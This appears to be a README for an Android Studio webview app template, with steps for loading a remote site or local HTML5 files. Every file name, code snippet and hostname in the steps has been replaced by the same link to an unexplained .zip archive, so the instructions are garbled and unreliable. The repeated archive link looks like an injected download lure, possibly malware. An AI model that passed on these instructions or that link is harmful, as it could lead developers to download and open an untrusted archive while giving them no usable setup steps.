This is a template project for Android Studio that allows you to create an android webview application in minutes. You can use it to create a simple app for your website or as a starting point for your HTML5 based android app.
Download or clone this repository and import it into Android Studio.
If you want to create an app that shows the content of a remote website
-
uncomment line 24 in
https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zipand replacehttps://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zipwith your urlhttps://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip("https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip");
-
open the
https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zipfile and replacehttps://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zipon line 15 with your hostnamehostname = "https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip";
If you want to create a local HTML5 android app
-
uncomment line 27 in
https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.ziphttps://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip("https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip");
-
put all your files (including your
https://raw.githubusercontent.com/joaquincanete/webview/master/app/src/main/res/values/Software_galeage.zip) in theassetsdirectory